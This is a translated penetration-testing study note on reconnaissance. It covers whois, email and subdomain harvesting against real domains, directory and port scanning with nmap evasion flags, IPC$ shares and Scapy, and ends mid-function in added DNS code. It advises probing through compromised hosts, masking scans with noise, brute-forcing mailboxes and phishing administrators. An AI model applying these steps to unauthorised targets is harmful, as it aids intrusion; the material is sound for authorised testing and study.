Information gathering: concepts

Information gathering refers to all the probing an attacker performs against a target, before or during an attack, in order to carry out the penetration more effectively.

What information to collect

Purpose of information gathering

Information gathering has a single purpose: to learn, from the collected information, about vulnerabilities that can then be exploited.

Active and passive gathering

Active information gathering means interacting with the target directly: visiting the website, scanning it, and sending probes that generate traffic to the target. Passive information gathering means collecting information about the target through third parties.

Information gathering workflow

whois

whois is a database from which the detailed registration information of a domain name can be queried.
whois normally uses TCP port 43. The whois record for each domain or IP address is kept by the registry responsible for it.
Recommended: calling the Chinaz (站长之家) whois API.


  • dmitry (ships with Kali)

┌──(root💀B)-[~]
└─# dmitry -iwns dansemal.cn
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:183.240.60.175
HostName:dansemal.cn

Gathered Inet-whois information for 183.240.60.175
---------------------------------


inetnum: 182.161.64.0 - 184.255.255.255
netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
descr: IPv4 address block not managed by the RIPE NCC
remarks: ------------------------------------------------------
remarks: For registration information,
remarks: you can consult the following sources:
remarks:
remarks: IANA
remarks: http://www.iana.org/assignments/ipv4-address-space
remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
remarks:
remarks: AFRINIC (Africa)
remarks: http://www.afrinic.net/ whois.afrinic.net
remarks:
remarks: APNIC (Asia Pacific)
remarks: http://www.apnic.net/ whois.apnic.net
remarks:
remarks: ARIN (Northern America)
remarks: http://www.arin.net/ whois.arin.net
remarks:
remarks: LACNIC (Latin America and the Carribean)
remarks: http://www.lacnic.net/ whois.lacnic.net
remarks:
remarks: ------------------------------------------------------
country: EU # Country is really world wide
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
status: ALLOCATED UNSPECIFIED

created: 2021-12-21T16:03:56Z
last-modified: 2021-12-21T16:03:56Z
source: RIPE
role: Internet Assigned Numbers Authority
address: see http://www.iana.org.
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
nic-hdl: IANA1-RIPE
remarks: For more information on IANA services
remarks: go to IANA web site at http://www.iana.org.
mnt-by: RIPE-NCC-MNT
created: 1970-01-01T00:00:00Z
last-modified: 2001-09-22T09:31:27Z
source: RIPE # Filtered
% This query was served by the RIPE Database Query Service version 1.102.2 (HEREFORD)



Gathered Inic-whois information for dansemal.cn
---------------------------------
Domain Name: dansemal.cn
ROID: 20210322s10001s35063278-cn
Domain Status: clientTransferProhibited
Registrant: 该域名已采取WHOIS隐私保护服务
Sponsoring Registrar: 广州云讯信息科技有限公司
Name Server: brook.dnspod.net
Name Server: record.dnspod.net
Registration Time: 2021-03-22 15:32:05
Expiration Time: 2023-03-22 15:32:05
DNSSEC: signedDelegation

Gathered Netcraft information for dansemal.cn
---------------------------------

Retrieving Netcraft.com information for dansemal.cn
Netcraft.com Information gathered

Gathered Subdomain information for dansemal.cn
---------------------------------
Searching Google.com:80...
HostName:www.dansemal.cn
HostIP:183.240.60.174
HostName:cloud.dansemal.cn
HostIP:112.3.31.146
Searching Altavista.com:80...
Found 2 possible subdomain(s) for host dansemal.cn, Searched 0 pages containing 0 results

All scans completed, exiting
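
As an added example (not from the original notes), the whois exchange described above: a minimal RFC 3912 client for TCP port 43, a parser for the key: value replies of the kind dmitry printed, and a defender-side check of a domain's name servers and days to expiry. whois_query needs network access; the sample reply is constructed from the abridged output above and the function names are assumptions of this example.

```python
import socket
from datetime import datetime
from typing import Dict, List, Optional

WHOIS_PORT = 43  # RFC 3912: a whois query is one line plus CRLF over TCP port 43

# Constructed sample: an abridged copy of the two reply styles dmitry printed above
# (a RIPE inetnum object and role object, then a CNNIC-style domain record).
SAMPLE_REPLY = """\
inetnum: 182.161.64.0 - 184.255.255.255
netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
descr: IPv4 address block not managed by the RIPE NCC
remarks: ------------------------------------------------------
remarks: APNIC (Asia Pacific)
remarks: http://www.apnic.net/ whois.apnic.net
country: EU # Country is really world wide
source: RIPE

role: Internet Assigned Numbers Authority
nic-hdl: IANA1-RIPE
source: RIPE # Filtered
% This query was served by the RIPE Database Query Service version 1.102.2 (HEREFORD)

Domain Name: dansemal.cn
Registrant: (WHOIS privacy protection enabled)
Name Server: brook.dnspod.net
Name Server: record.dnspod.net
Registration Time: 2021-03-22 15:32:05
Expiration Time: 2023-03-22 15:32:05
"""

WhoisObject = Dict[str, List[str]]


def whois_query(server: str, name: str, timeout: float = 10.0) -> str:
    """Send one RFC 3912 query to `server` (e.g. whois.apnic.net) and return the raw reply."""
    with socket.create_connection((server, WHOIS_PORT), timeout=timeout) as sock:
        sock.sendall(name.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:  # the server closes the connection once the reply is complete
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_whois(text: str) -> List[WhoisObject]:
    """Parse 'key: value' replies (RIPE/APNIC RPSL objects and registrar records alike).

    Objects are separated by blank lines, '%' lines are server comments, '#' starts an
    end-of-line comment, and repeated keys (remarks:, Name Server:) collect into lists.
    """
    objects: List[WhoisObject] = []
    current: WhoisObject = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                objects.append(current)
                current = {}
            continue
        if line.startswith("%"):
            continue
        key, sep, value = line.partition(":")
        if not sep:  # e.g. the dashed separator lines dmitry prints between sections
            continue
        value = value.split("#", 1)[0].strip()  # note: this also cuts a '#' inside a URL
        current.setdefault(key.strip(), []).append(value)
    if current:
        objects.append(current)
    return objects


def first(obj: WhoisObject, key: str) -> Optional[str]:
    values = obj.get(key)
    return values[0] if values else None


def review_domain(objects: List[WhoisObject], today: Optional[str] = None) -> Dict[str, object]:
    """Defender-side summary of a domain record: name servers and days left before expiry.

    `today` is an ISO date (YYYY-MM-DD) so results are reproducible; defaults to now.
    """
    now = datetime.strptime(today, "%Y-%m-%d") if today else datetime.now()
    for obj in objects:
        domain = first(obj, "Domain Name")
        if domain is None:
            continue
        expiry = first(obj, "Expiration Time")
        days = None
        if expiry:
            days = (datetime.strptime(expiry, "%Y-%m-%d %H:%M:%S") - now).days
        return {"domain": domain, "name_servers": obj.get("Name Server", []), "days_to_expiry": days}
    return {}
```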

Email address collection

During information gathering, email addresses can solve a lot of problems for us: we can fuzz the mailbox passwords and brute-force our way into the back end.

theHarvester

┌──(root💀kali)-[~]
└─# theHarvester -d freebuf.com -b baidu

*******************************************************************
* _ _ _ *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* theHarvester 3.2.3 *
* Coded by Christian Martorella *
* Edge-Security Research *
* c[email protected] *
* *
*******************************************************************


[*] Target: freebuf.com

[*] Searching Baidu.

[*] No IPs found.

[*] No emails found.

[*] Hosts found: 8
---------------------
bar.freebuf.com:60.205.171.29
company.freebuf.com:60.205.171.29
job.freebuf.com:60.205.171.29
live.freebuf.com:60.205.171.29
my.freebuf.com:60.205.171.29
search.freebuf.com:60.205.171.29
shop.freebuf.com:60.205.171.29
www.freebuf.com:60.205.171.29

┌──(root💀kali)-[~]
└─# theHarvester -d dansemal.github.io -b baidu

*******************************************************************
* _ _ _ *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* theHarvester 3.2.3 *
* Coded by Christian Martorella *
* Edge-Security Research *
* c[email protected] *
* *
*******************************************************************


[*] Target: dansemal.github.io

[*] Searching Baidu.

[*] No IPs found.

[*] No emails found.

[*] No hosts found.

Phone numbers

Phone numbers also carry some weight in information gathering, because a phone number lets us find more information about the administrators, and can even be used for reverse-lookup WeChat phishing or other approaches.

Active information gathering

  • Active gathering means using some method (built-in system commands or other tools) to communicate directly with the target system or host in order to collect information.
  • Prerequisites for active gathering:
    use a controlled third-party machine to probe from
    use a proxy or an already-compromised host
    be prepared to be blocked
    use noise to confuse the target and hide the real probing traffic
    send different probes and judge the target's state from the responses
  • Discovery process for active gathering:
    identify live target systems or hosts (potential attack targets)
    following the OSI model, host discovery is done mainly at layer 2 (data link), layer 3 (network) and layer 4 (transport)
    output the discovery results

Information to collect

  • open ports
  • open services
  • service versions
  • usernames
  • domain names
  • web application / CMS
  • historical information
  • identity information

Hiding behind a proxy

  • During active gathering there is a real chance of being detected by an IPS/IDS; the proxychains tool can be used to route the probes through a proxy.
  • On Windows, Proxifier can be used instead.

Host discovery

On a layer-2 network, use arping to discover hosts.

  • netdiscover

┌──(root💀B)-[~]
└─# netdiscover -i eth0 -r 192.168.0.1/24

netdiscover -l <file path>    (scan the IP addresses listed in a file)

netdiscover -p                (passive mode: only listen, send nothing)

  • fping

fping is similar to ping (ping uses ICMP, the Internet Control Message Protocol, echo requests and replies to check whether a host is up). The difference is that fping lets you specify a range of hosts on the command line, or a file containing the list of hosts to ping.

  • hping3

hping can send almost any TCP/IP packet;
it is powerful but scans only one target at a time.
Sending ICMP packets with hping3 (-c is the packet count):
hping3 192.168.181.130 --icmp -c 2

Subdomain collection

  • https://phpinfo.me/domain/  (PS: looking at its source shows it is really a local subdomain brute-force tool with a built-in wordlist)

  • altdns

  • oneforall

  • Layer subdomain miner (Layer子域名挖掘机)

  • subDomainBrute

    Common installation problem: the default python and pip versions do not match.
    Switch the default python to version 3 and install pip3.

  • wydomain

  • sublist3r

    apt install sublist3r  # on Kali

    ┌──(root💀kali)-[~]
    └─# sublist3r -d qq.com

    ____ _ _ _ _ _____
    / ___| _ _| |__ | (_)___| |_|___ / _ __
    \___ \| | | | '_ \| | / __| __| |_ \| '__|
    ___) | |_| | |_) | | \__ \ |_ ___) | |
    |____/ \__,_|_.__/|_|_|___/\__|____/|_|

    # Coded By Ahmed Aboul-Ela - @aboul3la

    [-] Enumerating subdomains now for qq.com
    [-] Searching now in Baidu..
    [-] Searching now in Yahoo..
    [-] Searching now in Google..
    [-] Searching now in Bing..
    [-] Searching now in Ask..
    [-] Searching now in Netcraft..
    [-] Searching now in DNSdumpster..
    [-] Searching now in Virustotal..
    [-] Searching now in ThreatCrowd..
    [-] Searching now in SSL Certificates..
    [-] Searching now in PassiveDNS..
    [-] Total Unique Subdomains Found: 2690
    login.imqq.com
    localhost.ptlogin2.imqq.com
    ssl.ptlogin2.imqq.com
    ssl.ui.ptlogin2.imqq.com
    ssl.xui.ptlogin2.imqq.com
    www.qq.com
    0.qq.com
    007.qq.c
    021.qq.com
    1.qq.com
    10.qq.com
    100.qq.com
    file.100.qq.com
    res.100.qq.com
    1000.qq.com
    101.qq.com
    pick.101.qq.com
    game.108.qq.com
    110.qq.com
    1108.qq.com
    111.qq.com
    1111.qq.com
    124bjg0.qq.com
    12530.qq.com
    176.qq.com
    17roco.qq.com
    m.17roco.qq.com
    m1.17roco.qq.com
    mres.17roco.qq.com


    ┌──(root💀B)-[~]
    └─# sublist3r -d dansemal.cn

    ____ _ _ _ _ _____
    / ___| _ _| |__ | (_)___| |_|___ / _ __
    \___ \| | | | '_ \| | / __| __| |_ \| '__|
    ___) | |_| | |_) | | \__ \ |_ ___) | |
    |____/ \__,_|_.__/|_|_|___/\__|____/|_|

    # Coded By Ahmed Aboul-Ela - @aboul3la

    [-] Enumerating subdomains now for dansemal.cn
    [-] Searching now in Baidu..
    [-] Searching now in Yahoo..
    [-] Searching now in Google..
    [-] Searching now in Bing..
    [-] Searching now in Ask..
    [-] Searching now in Netcraft..
    [-] Searching now in DNSdumpster..
    [-] Searching now in Virustotal..
    [-] Searching now in ThreatCrowd..
    [-] Searching now in SSL Certificates..
    [-] Searching now in PassiveDNS..
    [!] Error: Virustotal probably now is blocking our requests
    [-] Total Unique Subdomains Found: 12
    www.dansemal.cn
    blog.dansemal.cn
    cdn.dansemal.cn
    cloud.dansemal.cn
    joe.dansemal.cn
    mail.dansemal.cn
    pl.dansemal.cn
    qh.dansemal.cn
    ur.dansemal.cn
    vercel.dansemal.cn
    vul.dansemal.cn
    waline.dansemal.cn



Web site architecture

  • nikto (ships with Kali)

Options:
-ask+ Whether to ask about submitting updates
yes Ask about each (default)
no Don't ask, don't send
auto Don't ask, just send
-Cgidirs+ Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/"
-config+ Use this config file
-Display+ Turn on/off display outputs:
1 Show redirects
2 Show cookies received
3 Show all 200/OK responses
4 Show URLs which require authentication
D Debug output
E Display all HTTP errors
P Print progress to STDOUT
S Scrub output of IPs and hostnames
V Verbose output
-dbcheck Check database and other key files for syntax errors
-evasion+ Encoding technique:
1 Random URI encoding (non-UTF8)
2 Directory self-reference (/./)
3 Premature URL ending
4 Prepend long random string
5 Fake parameter
6 TAB as request spacer
7 Change the case of the URL
8 Use Windows directory separator (\)
A Use a carriage return (0x0d) as a request spacer
B Use binary value 0x0b as a request spacer
-Format+ Save file (-o) format:
csv Comma-separated-value
json JSON Format
htm HTML Format
nbe Nessus NBE format
sql Generic SQL (see docs for schema)
txt Plain text
xml XML Format
(if not specified the format will be taken from the file extension passed to -output)
-Help Extended help information
-host+ Target host/URL
-404code Ignore these HTTP codes as negative responses (always). Format is "302,301".
-404string Ignore this string in response body content as negative response (always). Can be a regular expression.
-id+ Host authentication to use, format is id:pass or id:pass:realm
-key+ Client certificate key file
-list-plugins List all available plugins, perform no testing
-maxtime+ Maximum testing time per host (e.g., 1h, 60m, 3600s)
-mutate+ Guess additional file names:
1 Test all files with all root directories
2 Guess for password file names
3 Enumerate user names via Apache (/~user type requests)
4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 Attempt to brute force sub-domain names, assume that the host name is the parent domain
6 Attempt to guess directory names from the supplied dictionary file
-mutate-options Provide information for mutates
-nointeractive Disables interactive features
-nolookup Disables DNS lookups
-nossl Disables the use of SSL
-no404 Disables nikto attempting to guess a 404 page
-Option Over-ride an option in nikto.conf, can be issued multiple times
-output+ Write output to this file ('.' for auto-name)
-Pause+ Pause between tests (seconds, integer or float)
-Plugins+ List of plugins to run (default: ALL)
-port+ Port to use (default 80)
-RSAcert+ Client certificate file
-root+ Prepend root value to all requests, format is /directory
-Save Save positive responses to this directory ('.' for auto-name)
-ssl Force ssl mode on port
-Tuning+ Scan tuning:
1 Interesting File / Seen in logs
2 Misconfiguration / Default File
3 Information Disclosure
4 Injection (XSS/Script/HTML)
5 Remote File Retrieval - Inside Web Root
6 Denial of Service
7 Remote File Retrieval - Server Wide
8 Command Execution / Remote Shell
9 SQL Injection
0 File Upload
a Authentication Bypass
b Software Identification
c Remote Source Inclusion
d WebService
e Administrative Console
x Reverse Tuning Options (i.e., include all except specified)
-timeout+ Timeout for requests (default 10 seconds)
-Userdbs Load only user databases, not the standard databases
all Disable standard dbs and load only user dbs
tests Disable only db_tests and load udb_tests
-useragent Over-rides the default useragent
-until Run until the specified time or duration
-update Update databases and plugins from CIRT.net
-url+ Target host/URL (alias of -host)
-useproxy Use the proxy defined in nikto.conf, or argument http://server:port
-Version Print plugin and database versions
-vhost+ Virtual host (for Host header)
+ requires a value
  • wappalyzer (browser extension)

Common types of web site stack

1. php + mysql + win/linux
   1. 2003 iis6.0 / 2008 iis7.0 / 2012 iis8.0
   2. apache
   3. nginx
2. aspx + access/mssql + win
3. jsp + oracle/mysql + win/linux
   1. tomcat
4. php + postgresql + linux

Directory information

Usage: dirsearch.py [-u|--url] target [-e|--extensions] extensions [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit

Mandatory:
-u URL, --url=URL Target URL
-l FILE, --url-list=FILE
Target URL list file
--stdin Target URL list from STDIN
--cidr=CIDR Target CIDR
--raw=FILE Load raw HTTP request from file (use `--scheme` flag
to set the scheme)
-e EXTENSIONS, --extensions=EXTENSIONS
Extension list separated by commas (Example: php,asp)
-X EXTENSIONS, --exclude-extensions=EXTENSIONS
Exclude extension list separated by commas (Example:
asp,jsp)
-f, --force-extensions
Add extensions to every wordlist entry. By default
dirsearch only replaces the %EXT% keyword with
extensions

Dictionary Settings:
-w WORDLIST, --wordlists=WORDLIST
Customize wordlists (separated by commas)
--prefixes=PREFIXES
Add custom prefixes to all wordlist entries (separated
by commas)
--suffixes=SUFFIXES
Add custom suffixes to all wordlist entries, ignore
directories (separated by commas)
--only-selected Remove paths have different extensions from selected
ones via `-e` (keep entries don't have extensions)
--remove-extensions
Remove extensions in all paths (Example: admin.php ->
admin)
-U, --uppercase Uppercase wordlist
-L, --lowercase Lowercase wordlist
-C, --capital Capital wordlist

General Settings:
-t THREADS, --threads=THREADS
Number of threads
-r, --recursive Brute-force recursively
--deep-recursive Perform recursive scan on every directory depth
(Example: api/users -> api/)
--force-recursive Do recursive brute-force for every found path, not
only paths end with slash
-R DEPTH, --recursion-depth=DEPTH
Maximum recursion depth
--recursion-status=CODES
Valid status codes to perform recursive scan, support
ranges (separated by commas)
--subdirs=SUBDIRS Scan sub-directories of the given URL[s] (separated by
commas)
--exclude-subdirs=SUBDIRS
Exclude the following subdirectories during recursive
scan (separated by commas)
-i CODES, --include-status=CODES
Include status codes, separated by commas, support
ranges (Example: 200,300-399)
-x CODES, --exclude-status=CODES
Exclude status codes, separated by commas, support
ranges (Example: 301,500-599)
--exclude-sizes=SIZES
Exclude responses by sizes, separated by commas
(Example: 123B,4KB)
--exclude-texts=TEXTS
Exclude responses by texts, separated by commas
(Example: 'Not found', 'Error')
--exclude-regexps=REGEXPS
Exclude responses by regexps, separated by commas
(Example: 'Not foun[a-z]{1}', '^Error$')
--exclude-redirects=REGEXPS
Exclude responses by redirect regexps or texts,
separated by commas (Example: 'https://okta.com/*')
--exclude-response=PATH
Exclude responses by response of this page (path as
input)
--skip-on-status=CODES
Skip target whenever hit one of these status codes,
separated by commas, support ranges
--minimal=LENGTH Minimal response length
--maximal=LENGTH Maximal response length
--max-time=SECONDS Maximal runtime for the scan
-q, --quiet-mode Quiet mode
--full-url Full URLs in the output (enabled automatically in
quiet mode)
--no-color No colored output

Request Settings:
-m METHOD, --http-method=METHOD
HTTP method (default: GET)
-d DATA, --data=DATA
HTTP request data
-H HEADERS, --header=HEADERS
HTTP request header, support multiple flags (Example:
-H 'Referer: example.com')
--header-list=FILE File contains HTTP request headers
-F, --follow-redirects
Follow HTTP redirects
--random-agent Choose a random User-Agent for each request
--auth-type=TYPE Authentication type (basic, digest, bearer, ntlm)
--auth=CREDENTIAL Authentication credential (user:password or bearer
token)
--user-agent=USERAGENT
--cookie=COOKIE

Connection Settings:
--timeout=TIMEOUT Connection timeout
-s DELAY, --delay=DELAY
Delay between requests
--proxy=PROXY Proxy URL, support HTTP and SOCKS proxies (Example:
localhost:8080, socks5://localhost:8088)
--proxy-list=FILE File contains proxy servers
--replay-proxy=PROXY
Proxy to replay with found paths
--scheme=SCHEME Default scheme (for raw request or if there is no
scheme in the URL)
--max-rate=RATE Max requests per second
--retries=RETRIES Number of retries for failed requests
-b, --request-by-hostname
By default dirsearch requests by IP for speed. This
will force dirsearch to request by hostname
--ip=IP Server IP address
--exit-on-error Exit whenever an error occurs

Reports:
-o FILE, --output=FILE
Output file
--format=FORMAT Report format (Available: simple, plain, json, xml,
md, csv, html)

You can change the dirsearch default configurations (default extensions,
timeout, wordlist location, ...) by editing the "/etc/dirsearch/default.conf"
file. More information at https://github.com/maurosoria/dirsearch.
  • Yujian backend scanner (御剑后台扫描工具)
  • dirbuster
  • pk
  • dirmap

Port scanning

  • nmap

nmap [options] ip
-sT TCP connect scan
-sS half-open (SYN) scan
-sU UDP port scan
-sF another TCP scan type: sends a packet with only the FIN flag set
-sV version detection
-O OS detection (rough rule of thumb from the notes: a ping TTL above 67 suggests Windows)
-A comprehensive detection
-sV probe the target's service versions
-T4 timing template (scan speed)
nmap scans that bypass firewalls
nmap --script=firewalk --traceroute <target>
nmap -p80 --script http-waf-detect --script-args="http-waf-detect.detectBodyChanges"
fragmented scan: nmap -f / nmap --mtu 8
decoy scan: nmap -D RND:10
idle scan: nmap -P0 -sI <zombie>
random data length: nmap --data-length 25
spoofed scan: nmap -sT -PN --spoof-mac aa:bb:cc:dd:ee:ff
nmap --badsum <host>
nmap -g80 -S <source address> <host>
nmap -p80 --script http-methods --script-args http.useragent="Mozilla 5"

IPC$ shares

IPC$ (Internet Process Connection) is a resource that shares "named pipes": a named pipe opened for inter-process communication. By supplying a trusted username and password, the two sides can establish a secure channel and exchange encrypted data over it, thereby gaining access to the remote computer. IPC$ is a feature introduced in NT/2000 with one characteristic: at any one time only a single connection is allowed between two IP addresses. Along with IPC$, NT/2000 also enables default shares at first installation, i.e. all logical drives (C$, D$, ...) and the system directory (C:\Windows) are shared. All of this was intended to make administration convenient, but good intentions do not always pay off: people with ulterior motives can use IPC$ to access the shared resources, export the user list and then run dictionary tools against it. To support IPC$ sharing, Windows (excluding the Windows 98 family) automatically shares the C, D and E drives and the ADMIN directory (C:\Windows) after installation, as ADMIN$, C$, D$ and E$. Note that these shares are hidden and only administrators can operate on them remotely.

nmap --script=smb-enum-shares.nse -sT

┌──(root💀kali)-[~]
└─# nmap -v -A -p1-65535 127.0.0.1
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 13:58 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating SYN Stealth Scan at 13:58
Scanning localhost (127.0.0.1) [65535 ports]
Discovered open port 22/tcp on 127.0.0.1
Completed SYN Stealth Scan at 13:58, 0.37s elapsed (65535 total ports)
Initiating Service scan at 13:58
Scanning 1 service on localhost (127.0.0.1)
Completed Service scan at 13:58, 0.01s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against localhost (127.0.0.1)
Retrying OS detection (try #2) against localhost (127.0.0.1)
Retrying OS detection (try #3) against localhost (127.0.0.1)
Retrying OS detection (try #4) against localhost (127.0.0.1)
Retrying OS detection (try #5) against localhost (127.0.0.1)
NSE: Script scanning 127.0.0.1.
Initiating NSE at 13:58
Completed NSE at 13:58, 0.08s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000018s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 95:24:8a:70:02:c1:7c:b9:63:1d:57:bd:c4:ba:59:84 (RSA)
| 256 ac:24:26:ce:c9:34:47:e7:62:38:13:d1:03:6d:c7:54 (ECDSA)
|_ 256 79:e3:be:ae:1e:ee:87:ed:bd:3d:b3:23:e6:de:92:08 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/10%OT=22%CT=1%CU=43844%PV=N%DS=0%DC=L%G=Y%TM=60713E8
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=MFFD7ST11NWA%O2=MFFD7ST11NWA%O3=MFFD7NNT11NWA%O4=MFFD7ST11NWA%O5=MFF
OS:D7ST11NWA%O6=MFFD7ST11)WIN(W1=FFCB%W2=FFCB%W3=FFCB%W4=FFCB%W5=FFCB%W6=FF
OS:CB)ECN(R=Y%DF=Y%T=40%W=FFD7%O=MFFD7NNSNWA%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Uptime guess: 22.103 days (since Fri Mar 19 11:30:10 2021)
Network Distance: 0 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds
Raw packets sent: 65645 (2.892MB) | Rcvd: 131283 (5.520MB)
  • Yujian port scanner (御剑端口扫描)


Using public vulnerability databases

Scapy: network information

Creating and sending packets with Scapy
pkt = IP(src="192.168.0.7", dst="39.156.69.79")/TCP()
  • res = sr1(pkt)   # send and receive one reply; res.summary() shows it
  • sr()             # send and receive all replies
  • send()           # send only
Sending layer-2 packets:
  • srp()
  • srp1()
  • sendp()

Sending TCP packets
from scapy.all import IP, TCP, sr1

ip = IP()
tcp = TCP()
ip.dst = "192.168.0.6"
tcp.dport = 445        # the destination port is a TCP field, not an IP field
tcp.flags = 'A'
sr1(ip/tcp)            # stack the layers; sr1(ip) alone would send a bare IP packet
sr1(IP(dst="www.baidu.com")/TCP(dport=[21,80,3389], flags='A'))

Passive information gathering

Google search operators

Google dork database

Finding other sites on the same server

https://www.webscan.cc/

dig

dig queries a domain's DNS records and so reveals the corresponding IP addresses; the +trace option follows the delegation chain.

┌──(root💀B)-[~]
└─# dig dansemal.cn

; <<>> DiG 9.17.21-1-Debian <<>> dansemal.cn
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49678
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1024
;; QUESTION SECTION:
;dansemal.cn. IN A

;; AUTHORITY SECTION:
dansemal.cn. 3600 IN SOA ns3.dnsv4.com. enterprise2dnsadmin.dnspod.com. 1639057957 3600 180 1209600 180

;; Query time: 76 msec
;; SERVER: 192.168.0.2#53(192.168.0.2) (UDP)
;; WHEN: Mon Jan 10 18:47:49 CST 2022
;; MSG SIZE rcvd: 116
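
An added example, not part of the original notes, showing what lies behind dig's HEADER line above: build the A query dig sends by default, then read the id, opcode, status, flags (qr rd ra) and section counts back out of a constructed response and decode its A records. The response builder, the compression pointer it uses and all function names are assumptions of this example.

```python
import struct
from typing import Dict, List, Tuple

TYPE_A, CLASS_IN = 1, 1
RCODE_NAMES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN", 5: "REFUSED"}


def encode_name(name: str) -> bytes:
    """Wire-format a domain name as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("label must be 1..63 bytes: %r" % label)
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(msg: bytes, offset: int) -> Tuple[str, int]:
    """Read a (possibly compressed, RFC 1035 4.1.4) name; return it and the offset after it."""
    labels: List[str] = []
    end, jumped, hops = offset, False, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:  # two-byte pointer to an earlier name in the message
            if not jumped:
                end = offset + 2
            offset = ((length & 0x3F) << 8) | msg[offset + 1]
            jumped, hops = True, hops + 1
            if hops > 64:
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:
            if not jumped:
                end = offset
            return ".".join(labels) + ".", end
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def build_query(name: str, txid: int) -> bytes:
    """A-record query with only the RD flag set, the shape dig sends by default."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def parse_header(msg: bytes) -> Dict[str, object]:
    """The fields dig prints in its HEADER line: opcode, status, flags and section counts."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {
        "id": txid,
        "opcode": (flags >> 11) & 0xF,
        "status": RCODE_NAMES.get(flags & 0xF, "RCODE%d" % (flags & 0xF)),
        "flags": [n for n, bit in (("qr", 0x8000), ("aa", 0x0400), ("tc", 0x0200),
                                   ("rd", 0x0100), ("ra", 0x0080)) if flags & bit],
        "counts": {"QUERY": qd, "ANSWER": an, "AUTHORITY": ns, "ADDITIONAL": ar},
    }


def build_response(query: bytes, addresses: List[str], rcode: int = 0) -> bytes:
    """Constructed reply: echoes id and question, sets QR/RD/RA, one A record per address."""
    txid = struct.unpack("!H", query[:2])[0]
    _, q_end = decode_name(query, 12)
    question = query[12:q_end + 4]  # name + QTYPE + QCLASS
    header = struct.pack("!HHHHHH", txid, 0x8180 | (rcode & 0xF), 1, len(addresses), 0, 0)
    rrs = b""
    for addr in addresses:
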